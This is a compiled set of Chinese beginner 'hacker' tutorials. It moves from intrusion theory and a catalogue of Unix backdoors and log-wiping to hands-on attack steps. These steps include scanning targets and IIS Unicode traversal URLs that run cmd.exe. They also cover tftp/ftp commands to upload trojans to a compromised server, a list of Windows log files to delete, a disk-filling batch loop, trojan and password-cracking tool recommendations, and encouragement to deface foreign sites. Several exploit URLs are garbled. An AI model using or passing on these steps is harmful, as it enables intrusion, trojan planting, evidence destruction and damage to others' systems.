黑客初级技术讲解（上）网络安全从其本质上来讲就是网络上的信息安全。从广义来说，凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标，信息安全包括两个方面：信息的存 储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全，如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全，有以下几个问题： 　　（１）对网络上信息的监听 　　（２）对用户身份的仿冒 　　（３）对网络上信息的篡改 　　（４）对发出的信息予以否认 　　（５）对信息进行重发 　　对于一般的常用入侵方法主要有 　　1.口令入侵 　　所谓口令入侵，就是指用一些软件解开已经得到但被人加密的口令文档，不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传，使得入侵电脑网络系统有时变得相当简单，一般不需要很深入了解系统的内部结构，是初学者的好方法。 　　2.特洛伊木马术 　　说到特洛伊木马，只要知道这个故事的人就不难理解，它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中，这时合法用户的程序代码已被该变。一旦用户触发该程序，那么依附在内的黑客指令代码同时被激活，这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验，且要更改代码、要一定的权限，所以较难掌握。但正因为它的复杂性，一般的系统管理员很难发现。 　　3.监听法 　　这是一个很实用但风险也很大的黑客入侵方法，但还是有很多入侵系统的黑客采用此类方法，正所谓艺高人胆大。 　　网络节点或工作站之间的交流是通过信息流的转送得以实现，而当在一个没有集线器的网络中，数据的传输并没有指明特定的方向，这时每一个网络节点或工作站都是一个接口。这就好比某一节点说：“嗨！你们中有谁是我要发信息的工作站。” 　　此时，所有的系统接口都收到了这个信息，一旦某个工作站说：“嗨！那是我，请把数据传过来。”联接就马上完成。 　　目前有网络上流传着很多嗅探软件，利用这些软件就可以很简单的监听到数据，甚至就包含口令文件，有的服务在传输文件中直接使用明文传输，这也是非常危险的 4.E-mail技术 　　使用email加木马程序这是黑客经常使用的一种手段，而且非常奏效，一般的用户，甚至是网管，对网络安全的意识太过于淡薄，这就给很多黑客以可乘之机。 　　5.病毒技术 　　作为一个黑客，如此使用应该是一件可耻的事情，不过大家可以学习，毕竟也是一种攻击的办法，特殊时间，特殊地点完全可以使用。 　　6.隐藏技术 　　网络攻击的一般步骤及实例 　　攻击的准备阶段 　　首先需要说明的是，入侵者的来源有两种，一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵，包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。 　　进行网络攻击是一件系统性很强的工作，其主要工作流程是：收集情报，远程攻击，远程登录，取得普通用户的权限，取得超级用户的权限，留下后门，清除日志。主要内容包括目标分析，文档获取，破解密码，日志清除等技术，下面分别介绍。 　　1.确定攻击的目的 　　攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的，即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标，使其不能正常工作，而不能随意控制目标的系统的运行。要达到破坏型攻击的目的，主要的手段是拒绝服务攻击（Denial Of Service）。另一类常见的攻击目的是入侵攻击目标，这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍，威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作，包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露，攻击者靠猜测或者穷举法来得到服务器用户的密码，然后就可以用和真正的管理员一样对服务器进行访问。 　　2.信息收集 　　除了确定攻击目的之外，攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本，目标提供哪些服务，各服务器程序的类型与版本以及相关的社会信息。 　　要攻击一台机器，首先要确定它上面正在运行的操作系统是什么，因为对于不同类型的操作系统，其上的系统漏洞有很大区别，所以攻击的方法也完全不同，甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验，有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时，如果显示 　　Unix（r）System V Release 4．0 　　login： 　　那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5．5或5．5．l。但这样确定操作系统类型是不准确的，因为有些网站管理员为了迷惑攻击者会故意更改显示信息，造成假象。 还有一种不是很有效的方法，诸如查询DNS的主机信息（不是很可靠）来看登记域名时的申请机器类型和操作系统类型，或者使用社会工程学的方法来获得，以及利用某些主机开放的SNMP的公共组来查询。 　　另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包，然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包（或者是任何没有ACK或SYN标记的包）到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP／UX和 IRIX会返回一个RESET。通过发送一个SYN包，它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记，而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类，如较早的Unix系统是64K长度，一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度，这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多，比较著名的有NMAP、CHECKOS、QUESO等。 　　获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要，因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口，例如一般TELNET在23端口，FTP在对21端口，WWW在80端口或8080端口，这只是一般情况，网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同，我们管这种软件叫做daemon，例如同样是提供FTP服务，可以使用wuftp、proftp，ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。 　　另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息，例如网站所属公司的名称、规模，网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系，实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码，如果掌握了该电话号码，就等于掌握了管理员权限进行信息收集可以用手工进行，也可以利用工具来完成，完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快，可以一次对多个目标进行扫描。 　　攻击的实施阶段 　　1.获得权限 　　当收集到足够的信息之后，攻击者就要开始实施攻击行动了。作为破坏性攻击，只需利用工具发动攻击即可。而作为入侵性攻击，往往要利用收集到的信息，找到其系统漏洞，然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了，但作为一次完整的攻击是要获得系统最高权限的，这不仅是为了达到一定的目的，更重要的是证明攻击者的能力，这也符合黑客的追求。 　　能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞，也包括由于管理配置不当而造成的漏洞。前不久，因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破，其主页面上的 Powered by Apache图样（羽毛状的图画）被改成了Powered by　Microsoft Backoffice的图样，那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的

           黑客初级技术讲解（中）           　　当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍，据统计80％以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。 　　无论作为一个黑客还是一个网络管理员，都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击，而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息，可以到诸如Rootshell（www.rootshell．com）、Packetstorm（packetstorm．securify．com）、Securityfocus（www.securityfocus．com）等网站去查找。 　　2.权限的扩大 　　系统漏洞分为远程漏洞和本地漏洞两种，远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大，黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限，而往往只是一个普通用户的权限，这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大，常常是扩大至系统的管理员权限。 只有获得了最高的管理员权限之后，才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大，不但可以利用已获得的权限在系统上执行利用本地漏洞的程序，还可以放一些木马之类的欺骗程序来套取管理员密码，这种木马是放在本地套取最高权限用的，而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限，那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序，当真正的合法用户登录时，运行了su，并输入了密码，这时root密码就会被记录下来，下次黑客再登录时就可以使用su变成root了。 　　攻击的善后工作 　　1.日志系统简介 　　如果攻击者完成攻击后就立刻离开系统而不做任何善后工作，那么他的行踪将很快被系统管理员发现，因为所有的网络操作系统一般都提供日志记录功能，会把系统上发生的动作记录下来。所以，为了自身的隐蔽性，黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法，首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置，根据操作系统的不同略有变化 　　／usr／adm——早期版本的Unix。 　　／Var／adm新一点的版本使用这个位置。 　　／Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。 　　／etc，大多数Unix版本把Utmp放在此处，一些Unix版本也把Wtmp放在这里，这也是Syslog．conf的位置。 　　下面的文件可能会根据你所在的目录不同而不同： 　　acct或pacct－一记录每个用户使用的命令记录。 　　accesslog主要用来服务器运行了NCSA HTTP服务器，这个记录文件会记录有什么站点连接过你的服务器。 　　aculo保存拨出去的Modems记录。 　　lastlog记录了最近的Login记录和每个用户的最初目的地，有时是最后不成功Login的记录。 　　loginlog一记录一些不正常的L0gin记录。 　　messages——记录输出到系统控制台的记录，另外的信息由Syslog来生成 　　security记录一些使用 UUCP系统企图进入限制范围的事例。 　　sulog记录使用su命令的记录。 　　utmp记录当前登录到系统中的所有用户，这个文件伴随着用户进入和离开系统而不断变化。 　　Utmpx，utmp的扩展。 　　wtmp记录用户登录和退出事件。 　　Syslog最重要的日志文件，使用syslogd守护程序来获得。 　　2.隐藏踪迹 　　攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了（只对常规 Unix系统而言），包括日志文件，所以一般黑客想要隐藏自己的踪迹的话，就会对日志进行修改。最简单的方法当然就是删除日志文件了，但这样做虽然避免了系统管理员根据IP追踪到自己，但也明确无误地告诉了管理员，系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别，网络上有许多此类功能的程序，例如 zap、 wipe等，其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息，使得当使用w、who、last等命令查看日志文件时，隐藏掉此用户的信息。 管理员想要避免日志系统被黑客修改，应该采取一定的措施，例如用打印机实时记录网络日志信息。但这样做也有弊端，黑客一旦了解到你的做法就会不停地向日志里写入无用的信息，使得打印机不停地打印日志，直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上，即使用loghost。即使是这样也不能完全避免日志被修改的可能性，因为黑客既然能攻入这台主机，也很可能攻入loghost。 　　只修改日志是不够的，因为百密必有一漏，即使自认为修改了所有的日志，仍然会留下一些蛛丝马迹的。例如安装了某些后门程序，运行后也可能被管理员发现。所以，黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit，这类程序在一些黑客网站可以找到，比较常见的有LinuxRootKit，现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序，当替换了ls后，就可以隐藏指定的文件，使得管理员在使用ls命令时无法看到这些文件，从而达到隐藏自己的目的。 　　3.后门 　　 一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。 　　<1>密码破解后门 　　这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。 　　<2>Rhosts + + 后门 　　在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +"，就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力. 许多管理员经常检查 "+ +"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名，从而不易被发现。 　　<3>校验和及时间戳后门 　　早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易 骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的，MD5使用的算法目前还没人能骗过。

黑客初级技术讲解（下）　　<4>Login后门 　　在Unix里，login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的 原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至 是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便 用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效<5>Telnetd后门 　　当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行 login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端. 典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为"letmein"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门，对来自特定源端口的连接产 生一个shell。 　　<6>服务后门 　　几乎所有网络服务曾被入侵者作过后门. Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。 　　<7>Cronjob后门 　　Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序，同时置入后门。 　　<8>库后门 　　几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。 因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以 当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。 　　<9>内核后门 　　内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。 　<10>文件系统后门 　　入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志，email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，"du"，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。 　　<11>Boot块后门 　　在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。 . 所以更多的管理员是 用MD5校验和检测这种后门的。 <12>隐匿进程后门 　　入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序 (sniffer)，有许多办法可以实现，这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此 当管理员用"ps"检查运行进程时，出现 的是标准服务名。可以修改库函数致使 "ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是 　　amod.tar.gz : 　　http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html网络通行. 这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行，管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。 　　<14>TCP Shell 后门 　　入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下，他 们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口，许多防火墙允许 e-mail通行的. 　　<15>UDP Shell 后门 　　管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。 　　<16>ICMP Shell 后门 　　Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。 　　<17>加密连接 　　管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密 后，就不可能被判定两台机器间的传输内容了。
基础知识（上）我认为这是一套适合初学者由浅到深的文章，所以强烈推荐给大家，作者从基础讲到最近比较火的漏洞，可能有些人看来是浅了些，但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。第一节，伸展运动。这节操我们要准备道具，俗话说：“工欲善其事，必先利其器”（是这样吗？哎！文化低……）说得有道理，我们要学习黑客技术，一点必要的工具必不可少。 1，一台属于自己的可以上网的电脑。这样你可以有充分的支配权，上网不用说，否则你怎么看到我的文章？wap?呵呵！属于自己很重要，否则安全性是个很大的问题。第一点相信大家没有问题。 2，windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的！（当然，我也是铁杆game fan)对网络支持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。这里我推荐2000，这是一个很成熟的系统（漏洞还是有一堆）。推荐双系统，这样黑玩搭配，干活不累。 3，冰河。中国第一木马，中者数不胜数，国人骄傲。虽然用冰河根本不能算黑客，但它确实能培养你对黑客的兴趣，同时帮助你了解网络，相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错，大家仔细看看。而且，以后你学会入侵服务器后，用冰河操作也会减少工作量（我是懒虫，爽！） 4，oicq。我们学黑客，可不是学泡mm!bfctx你………… 息怒息怒！我们当然是学黑客，但不要忘了，众人拾柴火更高，我们通过cshu的成员列表，互相联系帮助，对提高水平很有帮助！另外我要废话一句：据我了解，现在黑客网站下载最多的都是针对oicq的破解工具，我个人认为很无聊，偷个密码代表什么，浪费时间！最后补充：mm不能不泡。（谁砸我？？！！） 5，superscan。很好用的端口扫描器，速度超快，功能一流，一旦拥有，别无所求……（打住！）不论是找木马受害者，还是扫服务器端口，它都非常有效，cshu强烈推荐！ 6，一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。良好的习惯决定了你的效率，准备一本笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！ 7，lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是最好的解决办法，只要你拿的到sam，你就是服务器它爷爷！本站有其破解程序，支持了暴力破解！ 8，程序合并。这是玩木马必需的，虽然木马是很低的手段，但有时配合巧办法（以后我会介绍）确实能够达到意想不到的效果，朋友们可以在空闲时玩玩木马，很有趣，若你能巧妙的骗过mm,那么webmaster也可能被你骗倒：〉 （比较理想化） 9，流光4for 2000/nt。可能是世界上最好的综合类黑软！中国的骄傲，它集成了很全的漏洞信息，速度快，方法多，对有漏洞的主机是毁灭性的打击，操作又方便，是快速黑站必不可少的精品工具。超级吐血推荐！！ 10，良好的心态，稳定的情绪，刻苦钻研的精神，刨根问底的作风，打扫房间的习惯。黑客是门很高深的学问，不要幻想一步登天，失败是常有的事，千万不可灰心。在那么多黑软的包围下，切不可完全依赖他们，一定要了解它们利用什么原理工作。对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流的场所哦！黑完后不要得意忘形，打扫战场也很重要，以防万一。 第一节操完，可能很无聊，我就这点水平，大家见谅！这里我说一句大话：做完菜鸟操，包你会黑简单的站（哎哟！心慌了！） 下一节操我们要介绍如何掌握一台主机的基本信息，期待中…… 真是太对不起大家了，隔了那么久才写这篇教程，我这几天实在太忙，大家还是体谅一下我吧，好了，开始做操。 今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等。 首先我们我们要找一台主机来练手，随便挑吧！www.flyingfish.com(乱说的) 第一部，呵呵，先在ie里看看吧，mmmm.....做的还行，挺精致的！主要是我们肯定了它现在是正常的。 然后，我们应该知道它的ip,很简单，ping它一下就可以了。 ping www.flyingfish.com，看看窗口里有了什么？是不是有三行回应，其中的111.111.222.222就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，第一，你打错命令了；第二，该主机装了防火墙，禁止ping,不过这种可能很小。 知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值 21--ftp 重要哦 23--telnet 欢呼吧 25-smtp 尽管重要，但似乎没什么可利用的 53--domain 同上 79--finger 可知道用户信息了 80--http 要看网页，没它不行吧 110--pop 收信的 139--netbios 共享用的，很有利用价值哦 3389--win2000超级终端 呵呵，这个好！ 其实端口有上千种，这些最最常用 我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!） 那么我们该如何应对呢？ ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：） 若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scan flux等吧！反正，有ftp就有一份希望 telnet在！好!telnet 111.111.222.222，出现窗口了吧！嗯？要密码？看来网管还不是超级注意文明用语：）随便猜个，错了，闪人！ smtp,看着它，无奈 domain，一般它带了局域网了 finger 可以知道用户列表了，不好，忘了用法了，幸好finger很少出现 80肯定在，我们等会来对付它 110 有smtp，pop在也不奇怪了 139 找个扫描器来找找有没有露在外面的共享吧，日后也用得着 3389 太太太好了！！打开客户端吧，用输入法漏洞试试，成了就干了它！不成也没事，我们以后完全控制它3389会很方便的。 端口扫完了！我们在多了解它一点吧！追捕大家都知道吧，其实用它获取主机信息也不赖哦。打开追捕，输入ip,选择智能追捕，是不是有很多信息出来了？虽然不能直接利用，但毕竟我们有对它有了进一步的了解。 掌握了那么多信息，我们该做点什么了，一般黑客入侵都是靠着系统漏洞，不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。 对漏洞大家可能不太了解，我这里也不能一一说明了，太多了，感兴趣的话去论坛找freedom吧！ 目前广泛利用和存在的漏洞有：unicode,unicode后续，iis溢出，.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定，呵呵，绝对不会是一行一行地在ie中试吧，拿出x-scan吧，很好的扫描器哦！ 稍微设置一下就上路吧！过了一会，呵呵，报告出来了，快看，哇！漏洞一大堆！这下赚了！各条漏洞都有详细的信息，大家看吧，总比我说的准了。 现在这台主机已经和我们成为亲戚了，要让这位亲爱的亲戚做点事，就要开始各种攻击了，下回我们就探讨一下最最可爱的unicode漏洞，各位可能就会在unicode中完成第一次黑客体验
基础知识（中）上传，这个我们后面介绍。 几点忠告： 1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德 2，echo前记得帮他们做好备份 3，不准在主页里加入恶性语句 2，下载文件 要是有什么有用的文件被你发现，那我们如何下载呢？ 最简单的方法：把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。 别的方法：对不起，没想好：） 3，最重要的上传 一般方法：ftp法 首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧 echo+open ftp.cshu.com（ftp主机） > c:\hehe.haha echo+user yourname >> cc:\hehe.haha (yourname是用户名) echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码) echo+get setup.exe >> c:\hehe.haha 要下载的文件 echo+quit >> c:\hehe.haha 完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录） 别忘了先上传到ftp主机，不要做马大哈哦！ 最简单的方法：tftp法。 这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件） 在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：） 安装好后运行，别忘了设置好默认目录，否则会找不到文件 tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默认目录里） 1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！ 学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样） 4，如何清除痕迹 虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！ C:\winnt\system32\logfiles\*.* C:\winnt\ssytem32\config\*.evt C:\winnt\system32\dtclog\*.* C:\winnt\system32\*.log C:\winnt\system32\*.txt C:\winnt\*.txt C:\winnt\*.log 全……擦掉！ 四，细节问题。 1，遇到长文件名怎么办？ c:\program files\ 就用c:\"program20%files"\ 2，遇到空格怎么办？%代替喽，或者xx yy=xxyy~1 基础知识（5）%代替喽，或者xx yy=xxyy~1 3,如何做个很大的文件？ 目的就是破坏啦！我不喜欢不过教教你们啦 @echo off echo big > c:\a.a :h copy c:\a.a+c:\a.a c:\a.a goto h 注意不要乱来啊！ 4，输入命令，没反应或反应不对。 ：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！ http://www.exsample.com/scripts/ ... macr;..À ¯../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:\ 不一定有用哦！ 5，如何找到unicode漏洞的主机 呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：） 不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！ 6，我copy，del文件，怎么显示aceess denined? 这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！ 这个我会在今后介绍，现在你可以试试attrib attrib -r -h -s c:\autoexec.bat 再对autoexec.bat进行操作，看看有没有效果，成功率不高，不好意思！ 7，我黑了主页，天下无敌？ 我本来想对你说：“见你的鬼去吧！”不过想想不大礼貌，有失我绅士风度，所以改个口 echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！ 对cshu全体成员来说，不准去改正在建立的网页！这是我们的原则！ 要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择 8，我如何做更多的事？ 第一，努力提高权限 第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！ 一，frontpage扩展攻击。 